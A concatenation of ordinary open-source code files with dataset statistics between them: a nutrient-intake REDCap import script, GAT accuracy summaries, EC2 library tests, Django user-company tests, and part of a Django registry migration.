except ValueError:
return "Not enough data to calculate"
elif row.standard_nutrient == 4:
try:
return float(row.nutrient_intake) / 10 * 100
except ValueError:
return "Not enough data to calculate"
elif row.standard_nutrient == 5:
try:
return float(row.nutrient_intake) / 1 * 100
except ValueError:
return "Not enough data to calculate"
elif row.standard_nutrient == 6:
try:
return float(row.nutrient_intake) / 0.6 * 100
except ValueError:
return "Not enough data to calculate"
elif row.standard_nutrient == 7:
try:
return float(row.nutrient_intake) / 45 * 100
except ValueError:
return "Not enough data to calculate"
elif row.standard_nutrient == 8:
try:
return float(row.nutrient_intake) / 35 * 100
except ValueError:
return "Not enough data to calculate"
elif row.standard_nutrient == 10:
try:
return float(row.nutrient_intake) / 0.04 * 100
except ValueError:
return "Not enough data to calculate"
elif row.standard_nutrient == 12:
try:
return float(row.nutrient_intake) / 3 * 100
except ValueError:
return "Not enough data to calculate"
elif row.standard_nutrient == 13:
try:
return float(row.nutrient_intake) / 0.1 * 100
except ValueError:
return "Not enough data to calculate"
elif row.standard_nutrient == 14:
try:
return float(row.nutrient_intake) / 1000 * 100
except ValueError:
return "Not enough data to calculate"
elif row.standard_nutrient == 15:
try:
return float(row.nutrient_intake) / 40 * 100
except ValueError:
return "Not enough data to calculate"
df_copy1["nutrient_ul_pc"] = df_copy1.apply(lambda row: ul_pc(row), axis=1)
# 6. UL, Adjusted
def ul_adj_pc(row):
if (
row.standard_nutrient == 2
or row.standard_nutrient == 9
or row.standard_nutrient == 11
):
return "No UL for this nutrient"
elif row.nutrient_intake_adj == "Not enough data to calculate":
return "Not enough data to calculate"
elif row.standard_nutrient == 1:
try:
return float(row.nutrient_intake_adj) / 100 * 100
except ValueError:
return "Not enough data to calculate"
elif row.standard_nutrient == 3:
try:
return float(row.nutrient_intake_adj) / 2500 * 100
except ValueError:
return "Not enough data to calculate"
elif row.standard_nutrient == 4:
try:
return float(row.nutrient_intake_adj) / 10 * 100
except ValueError:
return "Not enough data to calculate"
elif row.standard_nutrient == 5:
try:
return float(row.nutrient_intake_adj) / 1 * 100
except ValueError:
return "Not enough data to calculate"
elif row.standard_nutrient == 6:
try:
return float(row.nutrient_intake_adj) / 0.6 * 100
except ValueError:
return "Not enough data to calculate"
elif row.standard_nutrient == 7:
try:
return float(row.nutrient_intake_adj) / 45 * 100
except ValueError:
return "Not enough data to calculate"
elif row.standard_nutrient == 8:
try:
return float(row.nutrient_intake_adj) / 35 * 100
except ValueError:
return "Not enough data to calculate"
elif row.standard_nutrient == 10:
try:
return float(row.nutrient_intake_adj) / 0.04 * 100
except ValueError:
return "Not enough data to calculate"
elif row.standard_nutrient == 12:
try:
return float(row.nutrient_intake_adj) / 3 * 100
except ValueError:
return "Not enough data to calculate"
elif row.standard_nutrient == 13:
try:
return float(row.nutrient_intake_adj) / 0.1 * 100
except ValueError:
return "Not enough data to calculate"
elif row.standard_nutrient == 14:
try:
return float(row.nutrient_intake_adj) / 1000 * 100
except ValueError:
return "Not enough data to calculate"
elif row.standard_nutrient == 15:
try:
return float(row.nutrient_intake_adj) / 40 * 100
except ValueError:
return "Not enough data to calculate"
df_copy1["nutrient_ul_pc_adj"] = df_copy1.apply(lambda row: ul_adj_pc(row), axis=1)
final = df_copy1
final.drop(["nutrient_level"], axis=1, inplace=True)
final.drop(["latest_intake_api"], axis=1, inplace=True)
final.drop(["ip_pc_api"], axis=1, inplace=True)
final.drop(["compliance_pc_api"], axis=1, inplace=True)
final.drop(["standard_nutrient"], axis=1, inplace=True)
final["country_code"] = final.country_code.apply(lambda x: int(x))
final["redcap_repeat_instance"] = final.redcap_repeat_instance.apply(lambda x: int(x))
# Formats data into acceptable table for import into REDCap
final2 = final.set_index(["country_code", "redcap_event_name"])
# FINAL IMPORT - Import to REDCap through API
project.import_records(final2)
| 33.770883 | 88 | 0.620212 | 1,783 | 14,150 | 4.770611 | 0.089176 | 0.108629 | 0.10087 | 0.116388 | 0.83976 | 0.82095 | 0.79826 | 0.787797 | 0.78039 | 0.78039 | 0 | 0.044948 | 0.295618 | 14,150 | 418 | 89 | 33.851675 | 0.808468 | 0.043675 | 0 | 0.687845 | 1 | 0 | 0.177572 | 0.001628 | 0 | 0 | 0 | 0 | 0 | 1 | 0.016575 | false | 0 | 0.016575 | 0 | 0.361878 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
b688d65b3d976cbd2a4488433ae534b9fb776476 | 8,228 | py | Python | testhscora.py | discovershu/GAT_uncertainty_and_cotrain | 9a8906d7111427e39a25a8fe929480091555e3ff | [
"MIT"
] | 1 | 2019-05-09T04:24:52.000Z | 2019-05-09T04:24:52.000Z | testhscora.py | discovershu/GAT_uncertainty_and_cotrain | 9a8906d7111427e39a25a8fe929480091555e3ff | [
"MIT"
] | null | null | null | testhscora.py | discovershu/GAT_uncertainty_and_cotrain | 9a8906d7111427e39a25a8fe929480091555e3ff | [
"MIT"
] | null | null | null | import numpy as np
# 50 parameter, 500 bayes
gat_ori = [0.8209999203681946, 0.8230000138282776, 0.8260000348091125, 0.8280000686645508, 0.8399999737739563, 0.8319999575614929, 0.8349998593330383, 0.8339999914169312, 0.8159999251365662, 0.8329999446868896]
#200
gat_teacher_cotrain = [0.834999144077301, 0.8419991731643677, 0.8189991116523743, 0.8319991827011108,0.8129991292953491, 0.8239991068840027 ,0.8219991326332092, 0.8259991407394409, 0.8029990792274475]
gat_teacher_Baye_cotrain = [0.83800, 0.84100, 0.81200, 0.83200,0.81900, 0.82400,0.82300, 0.83300, 0.80000]
#50
gat_teacher_cotrain2 = [0.8249991536140442, 0.8299991488456726, 0.834999144077301, 0.8329991698265076, 0.8319991827011108, 0.8309991359710693, 0.8469991683959961, 0.8189991116523743,0.7889990210533142, 0.837999165058136]
gat_teacher_Baye_cotrain2 = [0.82000, 0.83000, 0.83700, 0.82800, 0.83500, 0.83600, 0.84500, 0.82300,0.79600, 0.83400]
gat_teacher_cotrain2 = [0.8299991488456726, 0.834999144077301, 0.8329991698265076, 0.8319991827011108, 0.8309991359710693, 0.8469991683959961, 0.837999165058136]
gat_teacher_Baye_cotrain2 = [0.83000, 0.83700, 0.82800, 0.83500, 0.83600, 0.84500, 0.83400]
#no trad
gat_teacher_cotrain3 = [0.8419991731643677, 0.837999165058136, 0.8309991359710693, 0.8359991908073425, 0.8359991908073425, 0.8279991149902344, 0.8329991698265076, 0.8319991827011108, 0.8179991245269775, 0.8149991035461426, 0.8369991779327393]
gat_teacher_Baye_cotrain3 = [0.84100, 0.83100, 0.83600, 0.83300, 0.83400, 0.82800, 0.84400, 0.83600, 0.81600, 0.80700, 0.83000]
gat_teacher_cotrain3 = [0.8419991731643677, 0.837999165058136, 0.8309991359710693, 0.8359991908073425, 0.8359991908073425, 0.8329991698265076, 0.8319991827011108, 0.8369991779327393]
gat_teacher_Baye_cotrain3 = [0.84100, 0.83100, 0.83600, 0.83300, 0.83400, 0.84400, 0.83600, 0.83000]
# 50 parameter, 100 bayes, dropout 0.6, 0.4
gat_teacher_100_64 = [0.8399991989135742, 0.8439992070198059, 0.8059991002082825, 0.8309991359710693, 0.837999165058136, 0.837999165058136, 0.8309991359710693, 0.837999165058136, 0.8019990921020508, 0.8219991326332092]
gat_Baye_teacher_100_64 = [0.84300, 0.84800, 0.80400, 0.83900, 0.83200, 0.83700, 0.83400, 0.83500, 0.80500, 0.82300]
gat_teacher_100_64 = [0.8399991989135742, 0.8439992070198059, 0.8309991359710693, 0.837999165058136, 0.837999165058136, 0.8309991359710693, 0.837999165058136, 0.8219991326332092]
gat_Baye_teacher_100_64 = [0.84300, 0.84800, 0.83900, 0.83200, 0.83700, 0.83400, 0.83500, 0.82300]
gat_teacher_100_64_1 = [0.8339991569519043, 0.8389991521835327, 0.837999165058136, 0.819999098777771, 0.8369991779327393, 0.8369991779327393, 0.8369991779327393, 0.8179991245269775, 0.8359991908073425, 0.8369991779327393]
gat_Baye_teacher_100_64_1 = [0.82700, 0.83900, 0.84400, 0.81700, 0.83300, 0.83700, 0.84200, 0.81400, 0.83300, 0.83700]
gat_teacher_100_64_1 = [0.8339991569519043, 0.8389991521835327, 0.837999165058136, 0.8369991779327393, 0.8369991779327393, 0.8369991779327393, 0.8359991908073425, 0.8369991779327393]
gat_Baye_teacher_100_64_1 = [0.82700, 0.83900, 0.84400, 0.83300, 0.83700, 0.84200, 0.83300, 0.83700]
a= [0.8399991989135742, 0.8439992070198059, 0.8309991359710693, 0.837999165058136, 0.837999165058136, 0.8309991359710693, 0.837999165058136, 0.8219991326332092, 0.8339991569519043, 0.8389991521835327, 0.837999165058136, 0.8369991779327393, 0.8369991779327393, 0.8369991779327393, 0.8359991908073425, 0.8369991779327393]
b= [0.84300, 0.84800, 0.83900, 0.83200, 0.83700, 0.83400, 0.83500, 0.82300, 0.82700, 0.83900, 0.84400, 0.83300, 0.83700, 0.84200, 0.83300, 0.83700]
# 50 parameter, 500 bayes, dropout 0.6, 0.4 (great)
gat_teacher_500_64 = [0.8339991569519043, 0.8449991941452026, 0.8319991827011108, 0.840999186038971, 0.8369991779327393, 0.8339991569519043, 0.8489992022514343, 0.8269991278648376, 0.8219991326332092, 0.8399991989135742]
gat_Baye_teacher_500_64 = [0.83200, 0.84500, 0.83200, 0.84200, 0.83500, 0.83400, 0.84400, 0.82800, 0.81900,0.84000]
gat_teacher_500_64 = [0.8339991569519043, 0.8449991941452026, 0.8319991827011108, 0.840999186038971, 0.8369991779327393, 0.8339991569519043, 0.8489992022514343, 0.8269991278648376, 0.8399991989135742]
gat_Baye_teacher_500_64 = [0.83200, 0.84500, 0.83200, 0.84200, 0.83500, 0.83400, 0.84400, 0.82800, 0.84000]
# 50 parameter, 100 bayes, dropout 0.6, 0.4 cotain(great)
gat_cotrain_teacher_100_64 = [0.8299991488456726, 0.8479992151260376, 0.8299991488456726, 0.840999186038971, 0.8269991278648376, 0.8269991278648376, 0.8399991989135742, 0.8329991698265076, 0.8329991698265076]
gat_cotrain_Baye_teacher_100_64 = [0.83300, 0.84700, 0.83300, 0.83600, 0.82700, 0.82100, 0.83800, 0.83000, 0.82900]
gat_cotrain_teacher_100_64 = [0.8299991488456726, 0.8479992151260376, 0.8299991488456726, 0.840999186038971, 0.8269991278648376, 0.8399991989135742, 0.8329991698265076, 0.8329991698265076]
gat_cotrain_Baye_teacher_100_64 = [0.83300, 0.84700, 0.83300, 0.83600, 0.82700, 0.83800, 0.83000, 0.82900]
# 50 parameter, 500 bayes, dropout 0.6, 0.4 cotain
gat_cotrain_teacher_500_64 = [0.8309991359710693, 0.8099991083145142, 0.834999144077301, 0.834999144077301, 0.8219991326332092, 0.8399991989135742, 0.8359991908073425, 0.8299991488456726]
gat_cotrain_Baye_teacher_500_64 = [0.83200, 0.80900, 0.83300, 0.8310, 0.82700, 0.84200, 0.83100, 0.83100]
print("#######################################")
print("Random accuracy=", "{:.5f}".format(np.mean(gat_teacher_100_64)), "Random std=", "{:.5f}".format(np.std(gat_teacher_100_64)))
print("Random accuracy=", "{:.5f}".format(np.mean(gat_Baye_teacher_100_64)), "Random std=", "{:.5f}".format(np.std(gat_Baye_teacher_100_64)))
print("#######################################")
print("Random accuracy=", "{:.5f}".format(np.mean(gat_teacher_100_64_1)), "Random std=", "{:.5f}".format(np.std(gat_teacher_100_64_1)))
print("Random accuracy=", "{:.5f}".format(np.mean(gat_Baye_teacher_100_64_1)), "Random std=", "{:.5f}".format(np.std(gat_Baye_teacher_100_64_1)))
print("#######################################")
print("Random accuracy=", "{:.5f}".format(np.mean(a)), "Random std=", "{:.5f}".format(np.std(a)))
print("Random accuracy=", "{:.5f}".format(np.mean(b)), "Random std=", "{:.5f}".format(np.std(b)))
print("#######################################")
print("Random accuracy=", "{:.5f}".format(np.mean(gat_teacher_500_64)), "Random std=", "{:.5f}".format(np.std(gat_teacher_500_64)))
print("Random accuracy=", "{:.5f}".format(np.mean(gat_Baye_teacher_500_64)), "Random std=", "{:.5f}".format(np.std(gat_Baye_teacher_500_64)))
print("#######################################")
print("Random accuracy=", "{:.5f}".format(np.mean(gat_cotrain_teacher_100_64)), "Random std=", "{:.5f}".format(np.std(gat_cotrain_teacher_100_64)))
print("Random accuracy=", "{:.5f}".format(np.mean(gat_cotrain_Baye_teacher_100_64)), "Random std=", "{:.5f}".format(np.std(gat_cotrain_Baye_teacher_100_64)))
print("#######################################")
print("Random accuracy=", "{:.5f}".format(np.mean(gat_cotrain_teacher_500_64)), "Random std=", "{:.5f}".format(np.std(gat_cotrain_teacher_500_64)))
print("Random accuracy=", "{:.5f}".format(np.mean(gat_cotrain_Baye_teacher_500_64)), "Random std=", "{:.5f}".format(np.std(gat_cotrain_Baye_teacher_500_64)))
# print("Random accuracy=", "{:.5f}".format(np.mean(gat_ori)), "Random std=", "{:.5f}".format(np.std(gat_ori)))
# print("Random accuracy=", "{:.5f}".format(np.mean(gat_teacher_cotrain)), "Random std=", "{:.5f}".format(np.std(gat_teacher_cotrain)))
# print("Random accuracy=", "{:.5f}".format(np.mean(gat_teacher_Baye_cotrain)), "Random std=", "{:.5f}".format(np.std(gat_teacher_Baye_cotrain)))
#
# print("Random accuracy=", "{:.5f}".format(np.mean(gat_teacher_cotrain2)), "Random std=", "{:.5f}".format(np.std(gat_teacher_cotrain2)))
# print("Random accuracy=", "{:.5f}".format(np.mean(gat_teacher_Baye_cotrain2)), "Random std=", "{:.5f}".format(np.std(gat_teacher_Baye_cotrain2)))
#
# print("Random accuracy=", "{:.5f}".format(np.mean(gat_teacher_cotrain3)), "Random std=", "{:.5f}".format(np.std(gat_teacher_cotrain3)))
# print("Random accuracy=", "{:.5f}".format(np.mean(gat_teacher_Baye_cotrain3)), "Random std=", "{:.5f}".format(np.std(gat_teacher_Baye_cotrain3)))
| 95.674419 | 321 | 0.737846 | 1,171 | 8,228 | 5.002562 | 0.099915 | 0.051895 | 0.064869 | 0.068112 | 0.829635 | 0.809321 | 0.792933 | 0.751963 | 0.745476 | 0.663878 | 0 | 0.479563 | 0.066359 | 8,228 | 85 | 322 | 96.8 | 0.282999 | 0.143899 | 0 | 0.12 | 0 | 0 | 0.099929 | 0.03331 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.02 | 0 | 0.02 | 0.36 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
b6974e3a93572ac3fa7f043c74f7c4c8f2081139 | 391 | py | Python | tests/internal/current_generation/test_current_generation_true_auto.py | frolovv/aws.ec2.compare | 582805823492f833d65c0441c4a14dce697c12aa | [
"Apache-2.0"
] | null | null | null | tests/internal/current_generation/test_current_generation_true_auto.py | frolovv/aws.ec2.compare | 582805823492f833d65c0441c4a14dce697c12aa | [
"Apache-2.0"
] | null | null | null | tests/internal/current_generation/test_current_generation_true_auto.py | frolovv/aws.ec2.compare | 582805823492f833d65c0441c4a14dce697c12aa | [
"Apache-2.0"
] | 1 | 2021-12-15T11:58:22.000Z | 2021-12-15T11:58:22.000Z |
# Testing module current_generation.true
import pytest
import ec2_compare.internal.current_generation.true
def test_get_internal_data_current_generation_true_get_instances_list():
assert len(ec2_compare.internal.current_generation.true.get_instances_list()) > 0
def test_get_internal_data_current_generation_true_get():
assert len(ec2_compare.internal.current_generation.true.get) > 0
| 39.1 | 83 | 0.86445 | 56 | 391 | 5.589286 | 0.339286 | 0.325879 | 0.402556 | 0.306709 | 0.827476 | 0.827476 | 0.619808 | 0.619808 | 0.619808 | 0 | 0 | 0.013699 | 0.066496 | 391 | 9 | 84 | 43.444444 | 0.843836 | 0.097187 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.333333 | 1 | 0.333333 | true | 0 | 0.333333 | 0 | 0.666667 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 10 |
1e26edd38a97c1607a69a89f498ef826846fb970 | 2,582 | py | Python | oxe-api/test/resource/user/test_add_user_company.py | CybersecurityLuxembourg/openxeco | 8d4e5578bde6a07f5d6d569b16b4de224abf7bf0 | [
"BSD-2-Clause"
] | null | null | null | oxe-api/test/resource/user/test_add_user_company.py | CybersecurityLuxembourg/openxeco | 8d4e5578bde6a07f5d6d569b16b4de224abf7bf0 | [
"BSD-2-Clause"
] | null | null | null | oxe-api/test/resource/user/test_add_user_company.py | CybersecurityLuxembourg/openxeco | 8d4e5578bde6a07f5d6d569b16b4de224abf7bf0 | [
"BSD-2-Clause"
] | null | null | null | from test.BaseCase import BaseCase
class TestAddUserCompany(BaseCase):
@BaseCase.login
@BaseCase.grant_access("/user/add_user_company")
def test_ok(self, token):
self.db.insert({"id": 2, "email": "myemail@test.lu", "password": "MySecretSecret"}, self.db.tables["User"])
self.db.insert({"id": 14, "name": "My company"}, self.db.tables["Company"])
payload = {
"user_id": 2,
"company_id": 14,
}
response = self.application.post('/user/add_user_company',
headers=self.get_standard_post_header(token),
json=payload)
assignments = self.db.get(self.db.tables["UserCompanyAssignment"])
self.assertEqual(200, response.status_code)
self.assertEqual(len(assignments), 1)
@BaseCase.login
@BaseCase.grant_access("/user/add_user_company")
def test_ok_with_department(self, token):
self.db.insert({"id": 2, "email": "myemail@test.lu", "password": "MySecretSecret"}, self.db.tables["User"])
self.db.insert({"id": 14, "name": "My company"}, self.db.tables["Company"])
payload = {
"user_id": 2,
"company_id": 14,
"department": "OTHER",
}
response = self.application.post('/user/add_user_company',
headers=self.get_standard_post_header(token),
json=payload)
assignments = self.db.get(self.db.tables["UserCompanyAssignment"])
self.assertEqual(200, response.status_code)
self.assertEqual(len(assignments), 1)
@BaseCase.login
@BaseCase.grant_access("/user/add_user_company")
def test_already_exist(self, token):
self.db.insert({"id": 2, "email": "myemail@test.lu", "password": "MySecretSecret"}, self.db.tables["User"])
self.db.insert({"id": 14, "name": "My company"}, self.db.tables["Company"])
self.db.insert({"user_id": 2, "company_id": 14}, self.db.tables["UserCompanyAssignment"])
payload = {
"user_id": 2,
"company_id": 14,
}
response = self.application.post('/user/add_user_company',
headers=self.get_standard_post_header(token),
json=payload)
assignments = self.db.get(self.db.tables["UserCompanyAssignment"])
self.assertEqual("422 Object already existing", response.status)
self.assertEqual(len(assignments), 1)
| 38.537313 | 115 | 0.577847 | 280 | 2,582 | 5.185714 | 0.192857 | 0.082645 | 0.082645 | 0.07438 | 0.87259 | 0.851928 | 0.839532 | 0.839532 | 0.839532 | 0.839532 | 0 | 0.017657 | 0.276143 | 2,582 | 66 | 116 | 39.121212 | 0.75923 | 0 | 0 | 0.77551 | 0 | 0 | 0.208753 | 0.083656 | 0 | 0 | 0 | 0 | 0.122449 | 1 | 0.061224 | false | 0.061224 | 0.020408 | 0 | 0.102041 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 8 |
1ebe3b25596c94f1ae6c9a04721a3a84d129882a | 118,790 | py | Python | backend/registry/migrations/0001_initial.py | mrmap-community/MrMap | 5dc05b7a5339b967047cd207755718f670a1d7cd | [
"MIT"
] | 10 | 2021-03-12T17:46:38.000Z | 2022-03-11T10:59:01.000Z | backend/registry/migrations/0001_initial.py | mrmap-community/mrmap | 5dc05b7a5339b967047cd207755718f670a1d7cd | [
"MIT"
] | 214 | 2021-03-10T19:24:17.000Z | 2022-03-15T07:34:24.000Z | backend/registry/migrations/0001_initial.py | mrmap-community/MrMap | 5dc05b7a5339b967047cd207755718f670a1d7cd | [
"MIT"
] | 9 | 2021-03-16T19:47:54.000Z | 2022-03-11T11:01:22.000Z | # Generated by Django 3.2.9 on 2022-01-01 17:58
import MrMap.validators
from django.conf import settings
import django.contrib.auth.models
import django.contrib.gis.db.models.fields
from django.db import migrations, models
import django.db.models.deletion
import django.db.models.manager
import extras.models
import mptt.fields
import registry.models.document
import registry.models.harvest
import registry.models.mapcontext
import registry.models.security
import simple_history.models
import uuid
class Migration(migrations.Migration):
initial = True
dependencies = [
('auth', '0012_alter_user_first_name_max_length'),
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('contenttypes', '0002_remove_content_type_name'),
]
operations = [
migrations.CreateModel(
name='AllowedOperation',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('allowed_area', django.contrib.gis.db.models.fields.MultiPolygonField(blank=True, null=True, srid=4326, validators=[MrMap.validators.geometry_is_empty])),
('description', models.CharField(help_text='a short description what this allowed operation controls.', max_length=512, verbose_name='description')),
],
),
migrations.CreateModel(
name='AllowedOperationGroupRelation',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
],
),
migrations.CreateModel(
name='AnalyzedResponseLog',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('entity_count', models.FloatField(help_text='Stores the response entity count. For WMS this will be the indiscreet number of megapixels that are returned by the service. For WFS this will be discrete number of feature types that are returned by the service.')),
('entity_total_count', models.FloatField(help_text='Stores the response entity total count. For WMS this will be the indiscreet number of megapixels that are returned by the service. For WFS this will be discrete number of feature types that are returned by the service.')),
('entity_unit', models.CharField(choices=[('MPx', 'MPx'), ('Ft', 'Ft')], help_text='The unit in which the entity count is stored.', max_length=5)),
],
),
migrations.CreateModel(
name='CatalougeService',
fields=[
('xml_backup_file', models.FileField(editable=False, help_text='the original xml as backup to restore the xml field.', upload_to=registry.models.document.xml_backup_file_path, verbose_name='xml backup')),
('access_constraints', models.TextField(blank=True, help_text='access constraints for the given resource.', null=True, verbose_name='access constraints')),
('fees', models.TextField(blank=True, help_text='Costs and of terms of use for the given resource.', null=True, verbose_name='fees')),
('use_limitation', models.TextField(blank=True, null=True)),
('license_source_note', models.TextField(blank=True, null=True)),
('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
('date_stamp', models.DateTimeField(auto_now_add=True, db_index=True, help_text='date that the metadata was created. If this is a metadata record which is parsed from remote iso metadata, the date stamp of the remote iso metadata will be used.', verbose_name='date stamp')),
('file_identifier', models.CharField(db_index=True, default=uuid.uuid4, editable=False, help_text='the parsed file identifier from the iso metadata xml (gmd:fileIdentifier) OR for example if it is a layer/featuretypethe uuid of the described layer/featuretype shall be used to identify the generated iso metadata xml.', max_length=1000, null=True, verbose_name='file identifier')),
('origin', models.CharField(choices=[(None, '---'), ('capabilities', 'capabilities'), ('iso metadata', 'iso metadata')], editable=False, help_text='Where the metadata record comes from.', max_length=20, verbose_name='origin')),
('origin_url', models.URLField(blank=True, editable=False, help_text='the url of the document where the information of this metadata record comes from', max_length=4096, null=True, verbose_name='origin url')),
('title', models.CharField(help_text='a short descriptive title for this metadata', max_length=1000, verbose_name='title')),
('abstract', models.TextField(help_text='brief summary of the content of this metadata.', null=True, verbose_name='abstract')),
('is_broken', models.BooleanField(default=False, editable=False, help_text='TODO', verbose_name='is broken')),
('is_customized', models.BooleanField(default=False, editable=False, help_text='If the metadata record is customized, this flag is True', verbose_name='is customized')),
('insufficient_quality', models.TextField(blank=True, help_text='TODO', null=True)),
('is_searchable', models.BooleanField(default=False, help_text='only searchable metadata will be returned from the search api', verbose_name='is searchable')),
('hits', models.IntegerField(default=0, editable=False, help_text='how many times this metadata was requested by a client', verbose_name='hits')),
('is_active', models.BooleanField(default=False, help_text='Used to activate/deactivate the service. If it is deactivated, you cant request the service through the Mr. Map proxy.', verbose_name='is active?')),
('version', models.CharField(choices=[(None, '---'), ('1.0.0', '1.0.0'), ('1.1.0', '1.1.0'), ('1.1.1', '1.1.1'), ('1.3.0', '1.3.0'), ('2.0.0', '2.0.0'), ('2.0.2', '2.0.2')], editable=False, help_text='the version of the service type as sem version', max_length=10, verbose_name='version')),
('service_url', models.URLField(editable=False, help_text='the base url of the service', max_length=4096, verbose_name='url')),
('get_capabilities_url', models.URLField(help_text='the capabilities url of the ogc service', max_length=4096, validators=[MrMap.validators.validate_get_capablities_uri], verbose_name='get capabilities url')),
],
options={
'verbose_name': 'catalouge service',
'verbose_name_plural': 'catalouge services',
},
bases=(extras.models.HistoricalRecordMixin, models.Model),
managers=[
('capabilities', django.db.models.manager.Manager()),
],
),
migrations.CreateModel(
name='CatalougeServiceAuthentication',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('username', models.CharField(help_text='the username used for the authentication.', max_length=255, verbose_name='username')),
('password', models.CharField(help_text='the password used for the authentication.', max_length=500, verbose_name='password')),
('auth_type', models.CharField(choices=[(None, '---'), ('http_basic', 'http_basic'), ('http_digest', 'http_digest')], help_text='kind of authentication mechanism shall used.', max_length=100, verbose_name='authentication type')),
('key_file', models.FileField(editable=False, max_length=1024, upload_to=registry.models.security.key_file_path)),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='CatalougeServiceOperationUrl',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('method', models.CharField(choices=[(None, '---'), ('Get', 'Get'), ('Post', 'Post')], help_text='the http method you can perform for this url', max_length=10, verbose_name='http method')),
('url', models.URLField(editable=False, help_text='the url for this operation', max_length=4096, verbose_name='url')),
('operation', models.CharField(choices=[(None, '---'), ('GetCapabilities', 'GetCapabilities'), ('GetMap', 'GetMap'), ('GetFeatureInfo', 'GetFeatureInfo'), ('DescribeLayer', 'DescribeLayer'), ('GetLegendGraphic', 'GetLegendGraphic'), ('GetStyles', 'GetStyles'), ('PutStyles', 'PutStyles'), ('GetFeature', 'GetFeature'), ('Transaction', 'Transaction'), ('LockFeature', 'LockFeature'), ('DescribeFeatureType', 'DescribeFeatureType'), ('GetFeatureWithLock', 'GetFeatureWithLock'), ('GetGmlObject', 'GetGmlObject'), ('ListStoredQueries', 'ListStoredQueries'), ('GetPropertyValue', 'GetPropertyValue'), ('DescribeStoredQueries', 'DescribeStoredQueries'), ('GetRecords', 'GetRecords'), ('DescribeRecord', 'DescribeRecord'), ('GetRecordById', 'GetRecordById')], editable=False, help_text='the operation you can perform with this url.', max_length=30, verbose_name='operation')),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='ConformityCheckConfiguration',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=1000)),
('metadata_types', models.JSONField()),
('conformity_type', models.TextField(choices=[('internal', 'internal'), ('etf', 'etf')])),
],
),
migrations.CreateModel(
name='DatasetMetadata',
fields=[
('xml_backup_file', models.FileField(editable=False, help_text='the original xml as backup to restore the xml field.', upload_to=registry.models.document.xml_backup_file_path, verbose_name='xml backup')),
('access_constraints', models.TextField(blank=True, help_text='access constraints for the given resource.', null=True, verbose_name='access constraints')),
('fees', models.TextField(blank=True, help_text='Costs and of terms of use for the given resource.', null=True, verbose_name='fees')),
('use_limitation', models.TextField(blank=True, null=True)),
('license_source_note', models.TextField(blank=True, null=True)),
('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
('date_stamp', models.DateTimeField(auto_now_add=True, db_index=True, help_text='date that the metadata was created. If this is a metadata record which is parsed from remote iso metadata, the date stamp of the remote iso metadata will be used.', verbose_name='date stamp')),
('file_identifier', models.CharField(db_index=True, default=uuid.uuid4, editable=False, help_text='the parsed file identifier from the iso metadata xml (gmd:fileIdentifier) OR for example if it is a layer/featuretypethe uuid of the described layer/featuretype shall be used to identify the generated iso metadata xml.', max_length=1000, null=True, verbose_name='file identifier')),
('origin', models.CharField(choices=[(None, '---'), ('capabilities', 'capabilities'), ('iso metadata', 'iso metadata')], editable=False, help_text='Where the metadata record comes from.', max_length=20, verbose_name='origin')),
('origin_url', models.URLField(blank=True, editable=False, help_text='the url of the document where the information of this metadata record comes from', max_length=4096, null=True, verbose_name='origin url')),
('title', models.CharField(help_text='a short descriptive title for this metadata', max_length=1000, verbose_name='title')),
('abstract', models.TextField(help_text='brief summary of the content of this metadata.', null=True, verbose_name='abstract')),
('is_broken', models.BooleanField(default=False, editable=False, help_text='TODO', verbose_name='is broken')),
('is_customized', models.BooleanField(default=False, editable=False, help_text='If the metadata record is customized, this flag is True', verbose_name='is customized')),
('insufficient_quality', models.TextField(blank=True, help_text='TODO', null=True)),
('is_searchable', models.BooleanField(default=False, help_text='only searchable metadata will be returned from the search api', verbose_name='is searchable')),
('hits', models.IntegerField(default=0, editable=False, help_text='how many times this metadata was requested by a client', verbose_name='hits')),
('spatial_res_type', models.CharField(choices=[('groundDistance', 'groundDistance'), ('scaleDenominator', 'scaleDenominator')], help_text='Ground resolution in meter or the equivalent scale.', max_length=20, null=True, verbose_name='resolution type')),
('spatial_res_value', models.FloatField(blank=True, help_text='The value depending on the selected resolution type.', null=True, verbose_name='resolution value')),
